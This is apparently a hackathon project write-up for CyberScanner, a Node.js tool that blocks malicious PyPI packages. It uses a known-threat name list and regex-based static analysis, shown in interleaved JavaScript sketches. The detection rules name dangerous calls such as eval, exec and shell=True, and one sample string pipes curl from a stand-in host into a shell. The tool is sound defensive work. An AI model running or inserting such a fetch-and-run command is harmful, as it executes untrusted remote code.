CyberScanner

Inspiration

Open-source supply chain attacks have surged in recent years. Malicious packages published to PyPI have stolen credentials, exfiltrated environment variables, and even established reverse shells on developer machines. The problem is simple: when you run pip install, you are placing blind trust in code that can execute as part of the install itself. CyberScanner was built to add a security layer to that process without forcing developers to change how they already work.

What it does

CyberScanner intercepts pip install before anything executes locally and evaluates each package through two independent layers of protection.

The first layer checks the package name against the DataDog malicious-software-packages dataset, which contains over 1,800 confirmed PyPI threats. If a match is found, the package is blocked instantly without being downloaded.
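The name check in this first layer can be sketched as a set lookup. This is a minimal illustration, not CyberScanner's actual code: the helper names are hypothetical, the sample entries are invented, and the name normalization (PyPI's PEP 503 rule, which treats "Evil_Pkg" and "evil-pkg" as the same project) is an assumption about how names would be compared.

```javascript
// Hypothetical helpers; the sample names below are invented, not real dataset entries.

// PEP 503 normalization: lowercase, and collapse runs of "-", "_", "." into "-".
function normalizeName(name) {
  return name.toLowerCase().replace(/[-_.]+/g, "-");
}

// Build the lookup set once so every later check is a constant-time Set lookup.
function buildBlocklist(names) {
  return new Set(names.map(normalizeName));
}

function isKnownMalicious(blocklist, packageName) {
  return blocklist.has(normalizeName(packageName));
}

const blocklist = buildBlocklist(["Evil_Pkg", "totally.fake.stealer"]);
console.log(isKnownMalicious(blocklist, "evil-pkg")); // true
console.log(isKnownMalicious(blocklist, "requests")); // false
```

Normalizing both sides matters because a user can type a listed name with different casing or separators and still resolve to the same project.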

The second layer downloads the package safely using pip download --no-deps, extracts the archive, and performs static analysis on every Python file. It scans for dangerous behavioral patterns such as os.system(), subprocess execution, eval() and exec(), use of shell=True, base64-encoded payloads, and high-risk combinations like base64 decoding followed by execution. These signals are combined into a weighted risk score that determines whether the install is allowed, flagged, or blocked.
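The scoring step described above might look roughly like the following. The patterns mirror the behaviors listed in the paragraph, but the weights, the compound bonus, and both thresholds are placeholder assumptions chosen for illustration, not the values CyberScanner uses.

```javascript
// Illustrative rules. Weights and thresholds are ASSUMED values for this sketch.
const RULES = [
  { id: "os-system", pattern: /\bos\.system\s*\(/, weight: 3 },
  { id: "subprocess", pattern: /\bsubprocess\.(run|call|Popen|check_call|check_output)\s*\(/, weight: 2 },
  // The lookbehind skips method calls (obj.exec) and names like literal_eval.
  { id: "eval-exec", pattern: /(?<![\w.])(eval|exec)\s*\(/, weight: 3 },
  { id: "shell-true", pattern: /\bshell\s*=\s*True\b/, weight: 2 },
  { id: "b64-decode", pattern: /\bbase64\.b64decode\s*\(/, weight: 2 },
];

const COMPOUND_BONUS = 5; // base64 decoding plus eval/exec in the same file
const FLAG_THRESHOLD = 4;
const BLOCK_THRESHOLD = 8;

// Score one Python source file: sum the weights of matched rules,
// then add a bonus when the decode-then-execute combination is present.
function scanSource(source) {
  const hits = RULES.filter((rule) => rule.pattern.test(source));
  const signals = hits.map((rule) => rule.id);
  let score = hits.reduce((sum, rule) => sum + rule.weight, 0);
  if (signals.includes("b64-decode") && signals.includes("eval-exec")) {
    score += COMPOUND_BONUS;
  }
  return { score, signals };
}

function verdict(score) {
  if (score >= BLOCK_THRESHOLD) return "block";
  if (score >= FLAG_THRESHOLD) return "flag";
  return "allow";
}

const sample = 'import base64\nexec(base64.b64decode("cHJpbnQoMSk="))\n';
const result = scanSource(sample);
console.log(result.score, verdict(result.score)); // 10 block
```

With these example numbers, a single eval() call scores 3 and is allowed, while decoding a payload and executing it in the same file scores 10 and is blocked.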

How we built it

CyberScanner is implemented as a Node.js CLI using commander for argument parsing. The system uses pip download --no-deps to fetch packages without executing them. Archives are then extracted with adm-zip for .whl files and with the tar package for source distributions.
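A minimal sketch of the download and extraction steps, assuming pip is on the PATH and that adm-zip and tar are installed. The function names are hypothetical, and the third-party modules are loaded lazily so the helpers that do not need them stay usable on their own.

```javascript
const { execFile } = require("node:child_process");
const { promisify } = require("node:util");

const execFileAsync = promisify(execFile);

// Arguments for `pip download`: fetch only the named package into destDir.
function pipDownloadArgs(packageSpec, destDir) {
  return ["download", "--no-deps", "--dest", destDir, packageSpec];
}

// execFile passes arguments as an array, so no shell ever parses the package name.
async function downloadPackage(packageSpec, destDir) {
  await execFileAsync("pip", pipDownloadArgs(packageSpec, destDir));
}

// Wheels are zip archives; source distributions are usually gzipped tarballs.
function archiveKind(archivePath) {
  if (archivePath.endsWith(".whl")) return "zip";
  if (archivePath.endsWith(".tar.gz") || archivePath.endsWith(".tgz")) return "tar";
  throw new Error(`Unsupported archive type: ${archivePath}`);
}

// destDir must already exist before extraction.
async function extractArchive(archivePath, destDir) {
  if (archiveKind(archivePath) === "zip") {
    const AdmZip = require("adm-zip"); // third-party dependency
    new AdmZip(archivePath).extractAllTo(destDir, true);
  } else {
    const tar = require("tar"); // third-party dependency
    await tar.x({ file: archivePath, cwd: destDir });
  }
}
```

One caveat worth checking against the pip version in use: for source distributions, pip may still invoke the package's build backend to compute metadata during download. Adding --only-binary=:all: restricts the download to wheels, at the cost of failing for packages that publish no wheel.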

The behavioral scanner reads each Python file and applies regex-based pattern detection combined with a weighted scoring model. It also accounts for compound signals where multiple suspicious behaviors appear together. The DataDog dataset is fetched once and cached locally for 24 hours to ensure fast lookups.
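The 24-hour cache can be illustrated with a small wrapper around the fetch. This is a sketch only: the cache object and the fetchRemote callback are hypothetical stand-ins for whatever file and network I/O the tool actually performs.

```javascript
const CACHE_TTL_MS = 24 * 60 * 60 * 1000; // 24 hours

// A cache entry is fresh if it exists and is younger than the TTL.
function isFresh(entry, now = Date.now()) {
  return entry != null && now - entry.fetchedAt < CACHE_TTL_MS;
}

// Return cached data when fresh; otherwise fetch, store, and return the new copy.
async function getDataset(cache, fetchRemote, now = Date.now()) {
  const entry = cache.read();
  if (isFresh(entry, now)) return entry.data; // served locally, no network call
  const data = await fetchRemote();
  cache.write({ fetchedAt: now, data });
  return data;
}

// In-memory cache for demonstration; a real CLI would persist this to disk.
function createMemoryCache() {
  let entry = null;
  return {
    read: () => entry,
    write: (next) => {
      entry = next;
    },
  };
}
```

Passing the current time in as a parameter keeps the expiry logic easy to test without waiting a day or mocking the clock.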

To validate the system, we created a controlled test package called vulnpkg that simulates real malicious patterns safely. This allows us to verify detection accuracy end-to-end without introducing any risk.

Challenges we ran into

The biggest challenge was reducing false positives. Early versions relied on simple keyword matching, which incorrectly flagged legitimate packages like requests because they contained terms such as “subprocess” in harmless contexts.

We addressed this by refining detection to match specific call patterns, such as subprocess.call(, rather than the mere presence of a keyword. We also adjusted the scoring system so that individual weak signals do not trigger alerts. Only meaningful combinations of behaviors result in warnings or blocks.
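The difference between the two approaches shows up on a small example. The snippets below are invented Python fragments, not code from any real package, and the regex is one plausible way to express a call pattern rather than the exact expression CyberScanner uses.

```javascript
// Early approach: flag any file that mentions the word at all.
const keywordMatch = (source) => source.includes("subprocess");

// Refined approach: flag only an actual call on the subprocess module.
const callMatch = (source) =>
  /\bsubprocess\.(run|call|Popen|check_call|check_output)\s*\(/.test(source);

// Invented samples for illustration.
const harmless = '"""Helpers that avoid spawning a subprocess."""\nimport subprocess\n';
const risky = 'import subprocess\nsubprocess.call("curl http://example.invalid | sh", shell=True)\n';

console.log(keywordMatch(harmless), callMatch(harmless)); // true false
console.log(keywordMatch(risky), callMatch(risky)); // true true
```

A regex still cannot tell code from a comment or string literal that happens to contain a call, which is one reason the score requires several signals before warning.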

Accomplishments that we're proud of

We saw zero false positives on widely used packages such as requests, numpy, flask, and django, while still detecting every malicious pattern in our controlled test package. The test package consistently scores well above the block threshold.

The two-layer pipeline is also efficient. Known malicious packages are blocked by a name lookup before anything is downloaded, and unlisted packages are statically analyzed before any of their code is executed.

What we learned

We found that Python code can be analyzed effectively from a Node.js environment using regex matching over the source text. Most real-world PyPI malware relies on consistent behavioral patterns, which can be detected without executing code.

We also learned how to properly interpret the DataDog dataset structure, including how it distinguishes between fully malicious packages and those compromised at specific versions. This required different handling strategies within our detection pipeline.
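The two cases could be handled along these lines. The manifest shape here is an assumption made for illustration (a package name mapped to null when every version is malicious, or to a list of affected versions when a legitimate package was compromised). The entries are invented and the function name is hypothetical.

```javascript
// ASSUMED shape: name -> null (whole package malicious)
//                name -> [versions] (only these releases were compromised)
// The entries below are invented for illustration.
const exampleManifest = {
  "fake-stealer": null,
  "popular-lib": ["1.2.3", "1.2.4"],
};

function classify(manifest, name, version) {
  // hasOwnProperty avoids false hits on inherited keys such as "constructor".
  if (!Object.prototype.hasOwnProperty.call(manifest, name)) return "not-listed";
  const affected = manifest[name];
  if (affected === null) return "malicious"; // block regardless of version
  return affected.includes(version) ? "compromised-version" : "unaffected-version";
}

console.log(classify(exampleManifest, "fake-stealer", "0.1.0")); // malicious
console.log(classify(exampleManifest, "popular-lib", "1.2.3")); // compromised-version
console.log(classify(exampleManifest, "popular-lib", "2.0.0")); // unaffected-version
console.log(classify(exampleManifest, "requests", "2.31.0")); // not-listed
```

Under this assumption, a fully malicious package can be rejected by name alone, while a compromised package needs the requested version resolved before a decision is made.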

What's next for CyberScanner

We plan to expand CyberScanner beyond PyPI by adding support for npm and the broader Node.js ecosystem. We also want to enable full requirements.txt scanning so entire dependency sets can be evaluated before installation.

Future integrations include GitHub Actions for automated scanning on pull requests and a VS Code extension that surfaces risk warnings directly in the editor. We also plan to incorporate additional threat intelligence datasets to strengthen detection coverage.